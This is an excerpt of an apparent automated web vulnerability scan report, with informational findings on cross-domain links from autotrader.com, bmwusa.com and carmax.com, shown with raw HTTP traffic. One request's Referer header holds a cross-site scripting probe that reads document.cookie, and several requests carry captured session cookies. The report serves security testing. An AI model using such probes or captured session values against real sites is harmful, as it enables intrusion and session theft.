<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
<li><a birf:log="component" birf:cmp="loan_l" href="http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050" onClick="return BILogUtil.Redirector(this.href, ['mis=GNNDBDMGLT1136'], false).send();" title="Car loans">Loans</a>
...[SNIP]...
<noscript><img src="http://www.autotraderstatic.com/no_cache/bi_audit?Log=0"/></noscript>
...[SNIP]...
</form>
<img id="fyc-corner-top" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-top.png?v=3.17.167500" class="iePNG"/>
<img id="fyc-corner-bottom" src="http://www.autotraderstatic.com/img/index-b/fyc-corner-bottom.png?v=3.17.167500" class="iePNG"/>

<ul id="fyc-nav" class="clearfix"></ul>

<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
px%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=71015_1_TIMOFREASIER', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_71015.jpg?v=3.17.167500" alt="Trade In Marketplace" title="Trade In Marketplace" width="440" height="248"/></a>
...[SNIP]...
mage" href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=77599_2_FYCNEWFNDNOW', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_77599.jpg?v=3.17.167500" alt="Find New Cars" title="Find New Cars" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/research/new-cars/index.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76769_3_RESNEWFEELNG', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76769.jpg?v=3.17.167500" alt="New Car Research" title="New Car Research" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/top-tech.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76470_4_RESTPCTOPTEC', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76470.jpg?v=3.17.167500" alt="Top Car Tech" title="Top Car Tech" width="440" height="248"/></a>
...[SNIP]...
<a class="promo image" href="/about/mobile-faq.jsp" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNHB1368', 'rdpage=76859_5_MBLFAQPC2PKT', 'address='], false).send();"><img class="feature" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_76859.jpg?v=3.17.167500" alt="Mobile Phone" title="Mobile Phone" width="440" height="248"/></a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx%3Futm_source=autotrader&utm_medium=banner&utm_campaign=null+Hero1"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_71012.png?v=3.17.167500" width="69" height="43" alt="Trade In Marketplace" title="Trade In Marketplace" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/fyc/index.jsp%3Flang=en&search_type=new&showZipErrors=y"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_77600.png?v=3.17.167500" width="69" height="43" alt="Find New Cars" title="Find New Cars" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/research/new-cars/index.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76772.png?v=3.17.167500" width="69" height="43" alt="New Car Research" title="New Car Research" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/top-tech.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76472.png?v=3.17.167500" width="69" height="43" alt="Top Car Tech" title="Top Car Tech" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/about/mobile-faq.jsp"><img src="http://www.autotraderstatic.com/cms/img/homepage/thumbnail/images_76860.png?v=3.17.167500" width="69" height="43" alt="Mobile Phone" title="Mobile Phone" class="thumb iePNG"/></a>
...[SNIP]...
<a href="/about/mobile-faq.jsp?rdpage=HPT2PROMO" >
<img id="tab-ad-one-promo-img" src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64859.jpg?v=3.17.167500" width="300" height="100" alt="AutoTrader.com Mobile Website FAQ" />
</a>
...[SNIP]...
<li><a class="external-link" href="http://www.nadaguides.com/partner.aspx?adid=167244" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDMGNA1227', 'rdpage=HPTABRCH'], true).send();" title="Car valuation">What's my car worth?</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64860.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf?rdpage=HPT2PROMO" >
<img src="http://www.autotraderstatic.com/cms/img/homepage/promo/images_64560.jpg?v=3.17.167500" width="300" height="100" alt="Sell Your Car" />
</a>
...[SNIP]...
<a href="https://tradein.autotrader.com/ATPages/TradeInMarketPlace.aspx">
<img src="http://www.autotraderstatic.com/img/fsbo/tim.jpg?v=3.17.167500" alt="Trade-In Marketplace"/>
</a>
...[SNIP]...
<div class="module-seperator">
<img src="http://www.autotraderstatic.com/img/fsbo/fsbo_module-sep.png?v=3.17.167500" alt="" />
</div>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/syc_center.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/forsale.jpg?v=3.17.167500" alt="SYC Center"/>
</a>
...[SNIP]...
<li id="autotrader-classics">

<a class="external-link" href="http://www.autotraderclassics.com/?utm_source=atc&utm_medium=links&utm_content=atchp&utm_campaign=partnership+links" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNTO1107'], true).send();">
<img src="http://www.autotraderstatic.com/cms/img/homepage/autoTraderClassics_Logo.gif?v=3.17.167500" alt="" id="atcClassic-logo"/>
<span>
...[SNIP]...
<div id="autotrader-classics-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
<li id="auto-mercado">

<a class="external-link" href="http://www.autotraderlatino.com?LNX=ATCAMHMPGBUSC" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNFC737'], true).send();">
<img id="atcLatino-logo" src="http://www.autotraderstatic.com/cms/img/homepage/autoMercado_logo.gif?v=3.17.167500" alt=""/>
<span>
...[SNIP]...
<div id="autotrader-latino-hr">
<img src="http://www.autotraderstatic.com/img/index-b/affiliates-module-hr.gif?v=3.17.167500"/>
</div>
...[SNIP]...
</script>

<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;" id="atcDealsOnWheels-logo" src="http://www.autotraderstatic.com/cms/img/homepage/Deals_on_Wheels.gif?v=3.17.167500" alt=""/>
<div style="float: left;cursor:pointer;" id="dow_text">
...[SNIP]...
</a>
<a href="http://www.dealsonwheels.com/" onmouseover="dow_mover()" onmouseout="dow_mout()" onclick="return BILogUtil.Redirector(this.href, ['mis=HMNDBDLNDW1108'], true).send();">
<img style="float: left;padding-left:6px;padding-top:4px;" src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" id="dow_offsite"/>
</a>
...[SNIP]...
</div>

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/redirects.css?v=3.17.167500" />

<div id="intlRedirectModal">
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.carmony.co.uk">
<img src="http://www.autotraderstatic.com/img/redirects/carmony-logo3.jpg?v=3.17.167500"/>Take me to Carmony.co.uk, AutoTrader.com&reg;'s sister site, to look for cars in the U.K.
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div class="redirectModalContent">
<img class="logo" src="http://www.autotraderstatic.com/img/ATCweb_white_223x29.jpg?v=3.17.167500" width="223" height="29" alt="AutoTrader.com" />
<h2 class="title">
...[SNIP]...
</p>
<img class="loader" src="http://www.autotraderstatic.com/img/shared/ajax-loader.gif?v=3.17.167500" />
<p class="callToAction">
...[SNIP]...
<li>
<a href="http://www.allapprovedcars.be">
<img src="http://www.autotraderstatic.com/img/redirects/allapprovedcars-logo3.jpg?v=3.17.167500"/>Take me to AllApprovedCars.be, AutoTrader.com&reg;'s sister site, to look for cars in Belgium
</a>
...[SNIP]...
<a href="#">
<img src="http://www.autotraderstatic.com/img/redirects/autotrader-logo3.jpg?v=3.17.167500"/>I want to stay and look for cars on AutoTrader.com in the U.S.A.
</a>
...[SNIP]...
<div style="display:none;"><img src="http://beacon.afy11.net/ad?&mode=4&ac=0&av=0&rand=1295964847034&kd=autotraderhomepage" width="0" height="0" alt="Adify"/></div>

<div style="display:none;"><img src="http://pc1.yumenetworks.com/dynamic_gn_atzsqnlc_1295964847034?yumehomepage" width="0" height="0" alt="YuMe"/></div>
...[SNIP]...
<li><a href="http://autotrader.mediaroom.com/" onclick="return BILogUtil.Redirector(this.href, ['mis=ALLBFTLNPR1248'], false).send();" >Press Room</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=3003809;type=homep126;cat=autot581;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.562. http://www.autotrader.com/hornav/trader/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /hornav/trader/index.jsp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autotrader.com/hornav/trader/index.jsp?LNX=PTRDRSYCTAB
The response contains the following links to other domains:
  • http://ad.doubleclick.net/activity;src=991248;type=selly314;cat=fsbol647;ord=1?
  • http://autotrader.mediaroom.com/
  • http://autotrader.mota.com/lp/atvip8?c=ATVIP9&zip=
  • http://cetrk.com/pages/scripts/0006/4068.js
  • http://www.autotraderstatic.com/cms/css/new_model.css?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_61698.jpg?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_61699.jpg?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_61701.png?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_61703.jpg?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_69093.png?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_69094.png?v=3.17.167500
  • http://www.autotraderstatic.com/cms/img/images_71597.jpg?v=3.17.167500
  • http://www.autotraderstatic.com/cms/resources/fsbo/fsbo_landing.css?v=3.17.167500
  • http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
  • http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
  • http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
  • http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500
  • http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500
  • http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500
  • http://www.autotraderstatic.com/img/fsbo/btn_learn_more.jpg?v=3.17.167500
  • http://www.autotraderstatic.com/img/fsbo/price-your-car.jpg?v=3.17.167500
  • http://www.autotraderstatic.com/img/fsbo/secure.gif?v=3.17.167500
  • http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500
  • http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500
  • http://www.autotraderstatic.com/inc/css/fsbo/new-gen-syc.css?v=3.17.167500
  • http://www.autotraderstatic.com/inc/css/fsbo/newfsbo2.css?v=3.17.167500
  • http://www.autotraderstatic.com/inc/css/homepage/index-b-SYC.css?v=3.17.167500
  • http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500
  • http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
  • http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500
  • http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500
  • http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
  • http://www.autotraderstatic.com/no_cache/bi_audit?Log=0
  • http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500
  • http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050
  • https://fls.doubleclick.net/activityi;src=1829700;type=pscou187;cat=place918;ord=1?

Request

GET /hornav/trader/index.jsp?LNX=PTRDRSYCTAB HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=C02306C0B00185723586B177780BC2FB; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:16 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=2134009354.61475.0000; path=/
Content-Length: 44406


<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:
...[SNIP]...
<noscript><img src="http://www.autotraderstatic.com/no_cache/bi_audit?Log=0"/></noscript>
...[SNIP]...
<link rel="stylesheet" href="/inc/css/master.css" type="text/css" />


<link rel="stylesheet" href="http://www.autotraderstatic.com/css/atc-ui.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/index-b-header.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-1.7.2.custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/js/jqueryui/css/atc-theme/jquery-ui-atc-custom.css?v=3.17.167500" type="text/css"/>
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/fsbo/newfsbo2.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/cms/css/new_model.css?v=3.17.167500" type="text/css" />
<link rel="stylesheet" href="http://www.autotraderstatic.com/cms/resources/fsbo/fsbo_landing.css?v=3.17.167500" type="text/css" />


<style type="text/css">
...[SNIP]...
</style>

<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/homepage/index-b-SYC.css?v=3.17.167500" type="text/css" />


<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/fsbo/new-gen-syc.css?v=3.17.167500" type="text/css" />


<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>


<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<a id="atc-logo" birf:cmp="atc_lgo" href="/"><img birf:log="component" birf:ref="../" src="http://www.autotraderstatic.com/img/index-b/atc-logo.gif?v=3.17.167500" alt="Buy New or Used Cars at AutoTrader.com"/></a>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
<li><a birf:log="component" birf:cmp="loan_l" href="http://www.lendingtree.com/alliance/from.asp?whereto=auto&bp=autotrader4&source=1569050&esourceid=1569050" onClick="return BILogUtil.Redirector(this.href, ['mis=GNNDBDMGLT1136'], false).send();" title="Car loans">Loans</a>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
<td style="padding-left:3px;">
<img src="http://www.autotraderstatic.com/cms/img/images_61701.png?v=3.17.167500" onmouseover="this.src='/cms/img/images_61702.png';" onmouseout="this. src='http://www.autotraderstatic.com/cms/img/images_61701.png?v=3.17.167500';" onclick="disableSurvey();$('syc_bridge').submit();" />
<input type="submit" onclick="disableSurvey();" value="" id="submitBtn" class="submitBtn" style="display:none;"/>
...[SNIP]...
<div style="font-size:12px;padding-top:10px;font-weight:bold;">
<img src="http://www.autotraderstatic.com/cms/img/images_61703.jpg?v=3.17.167500" />&#160;
<a class="quiz-link" href="https://sell.autotrader.com/syc/syc_wizard.jsf" >
...[SNIP]...
<div id="right-promo-1" style=" padding-top: 15px; display: none;"><img alt="" src="http://www.autotraderstatic.com/cms/img/images_69093.png?v=3.17.167500" /></div><div id="right-promo-2" style=" padding-top: 15px; display: none;"><img alt="" src="http://www.autotraderstatic.com/cms/img/images_69094.png?v=3.17.167500" /></div>
...[SNIP]...
<td class="left-twitter">

<a href="http://autotrader.mota.com/lp/atvip8?c=ATVIP9&zip=" onclick="return BIHelper.logEventForAC('syc_landing_VIP_link', this.href, 'BIHelper.openInNewWindow()', 'NA')">
<img src="http://www.autotraderstatic.com/cms/img/images_71597.jpg?v=3.17.167500" alt="" />
</a>
...[SNIP]...
<a href="https://sell.autotrader.com/syc/pricing_tool.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/price-your-car.jpg?v=3.17.167500" onmouseover="this.src='/img/fsbo/price-your-car_over.jpg';" onmouseout="this. src='http://www.autotraderstatic.com/img/fsbo/price-your-car.jpg?v=3.17.167500';" />
</a>
...[SNIP]...
g_why_atc', this.href, 'BIHelper.openInPopup(600, 817)', 'syc');" href="https://sell.autotrader.com/syc/cms/resources/fsbo/why_atc.jsf">
<img src="http://www.autotraderstatic.com/img/fsbo/btn_learn_more.jpg?v=3.17.167500" onmouseover="this.src='/img/fsbo/btn_learn_more_over.jpg';" onmouseout="this. src='http://www.autotraderstatic.com/img/fsbo/btn_learn_more.jpg?v=3.17.167500';" />
</a>
...[SNIP]...
<div style="text-align:center;width:155px;"><img src="http://www.autotraderstatic.com/cms/img/images_61698.jpg?v=3.17.167500" /></div>
...[SNIP]...
<td class="right">
<img src="http://www.autotraderstatic.com/cms/img/images_61699.jpg?v=3.17.167500" />
</td>
...[SNIP]...
/redirect/redirector_link.jsp?to_url=http%3A%2F%2Fwww.autotraderclassics.com%2F%3Futm_source%3Datc%26utm_medium%3Dlinks%26utm_content%3Datcsyc%26utm_campaign%3Dpartnership+links&amp;mis=SCNDBDLNTO697"><img src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" /></a>
...[SNIP]...
<a href="http://www.autotrader.com/redirect/redirector_link.jsp?to_url=http%3A%2F%2Fwww.autotraderlatino.com/&amp;mis=SCNDBDLNT01333"><img src="http://www.autotraderstatic.com/img/standardicons/offsite_icon_off-state_03.gif?v=3.17.167500" /></a>
...[SNIP]...
<p><img src="http://www.autotraderstatic.com/img/fsbo/secure.gif?v=3.17.167500" class="secureIcon"><a onmouseout="document.getElementById('safeLinkHoverB').style.display='none'" onmouseover="document.getElementById('safeLinkHoverB').style.display='block'" href="javascript:void(0);">
...[SNIP]...
<NOSCRIPT>
<IMG SRC="http://ad.doubleclick.net/activity;src=991248;type=selly314;cat=fsbol647;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=1829700;type=pscou187;cat=place918;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<li><a href="http://autotrader.mediaroom.com/" onclick="return BILogUtil.Redirector(this.href, ['mis=ALLBFTLNPR1248'], false).send();" >Press Room</a>
...[SNIP]...
</iframe>


<script type="text/javascript" src="http://cetrk.com/pages/scripts/0006/4068.js"> </script>
...[SNIP]...

20.563. http://www.autotraderstatic.com/inc/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /inc/global.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
The response contains the following links to other domains:
  • http://autotrader.com/
  • http://www.autotrader.com/

Request

GET /inc/global.js?v=3.17.167500 HTTP/1.1
Host: www.autotraderstatic.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: M7F1=CT
If-Modified-Since: Wed, 03 Nov 2010 17:49:34 GMT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 03 Nov 2010 17:49:34 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Cache-Control: max-age=194472
Expires: Thu, 27 Jan 2011 20:24:52 GMT
Date: Tue, 25 Jan 2011 14:23:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 62326

/**
* Container for BI logging functions
* @author John Napier
*/
var BILogUtil = {
/**
* Build an engine for searching the DOM, capturing reporting code, and associating
* a BILogUti
...[SNIP]...

* "class" or "id" attributes:
*
* == Script ==
* BILogUtil.Engine("mis", ["class", "id"]).automate();
*
* == Links ==
* <a href="http://autotrader.com" class="mis-123423423">Text</a>
* <a href="http://www.autotrader.com" id="mis-98765MIS">Text</a>
...[SNIP]...
st
* the "title" attribute
*
* == Script ==
* BILogUtil.Engine(["mis", "rdpage"], "title").automate();
*
* == Links ==
* <a href="http://www.autotrader.com" title="mis-1234MISCODES rdpage-MyRDPageParam">Text</a>
...[SNIP]...

20.564. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:
  • https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
The response contains the following link to another domain:
  • https://com-bmwusa.netmng.com/

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:16 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:16 GMT;path=/
Content-Length: 212255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="https://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

20.565. http://www.carmax.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carmax.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.carmax.com/?adcode=GOOAW500701E&pkw=autotrader&s=0/x22
The response contains the following links to other domains:
  • http://phx.corporate-ir.net/phoenix.zhtml?c=125417&p=irol-irhome
  • http://phx.corporate-ir.net/phoenix.zhtml?c=232927&p=irol-overview
  • http://www.facebook.com/CarMax
  • http://www.googleadservices.com/pagead/conversion.js
  • http://www.googleadservices.com/pagead/conversion/1009281771/?label=D0eOCK2u4AEQ69Wh4QM&guid=ON&script=0
  • http://www.twitter.com/CarMax
  • https://epayment.epymtservice.com/epay.jhtml?productCode=AUTHORIZED_PRODUCT&billerId=MAX&billerGroupId=CAR

Request

GET /?adcode=GOOAW500701E&pkw=autotrader&s=0/x22 HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB032T0x0000000e_0xc6b22d20CMLJW; expires=Mon, 24-Jan-2011 17:04:32 GMT; path=/
Connection: close
Date: Mon, 24 Jan 2011 16:04:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: KmxVisitor_0=VisitorID=4073eb59-f703-43e1-91c2-7e99cee8909d&CookieDate=1/24/2011 11:04:33 AM&AdCode=GOOAW500701E&AdCodeDate=1/24/2011 11:04:33 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:33 GMT; path=/
Set-Cookie: KmxSession_0=c1b45976-a5a9-48ba-ab1b-54bf37377127; domain=.carmax.com; path=/
Set-Cookie: KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:33 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
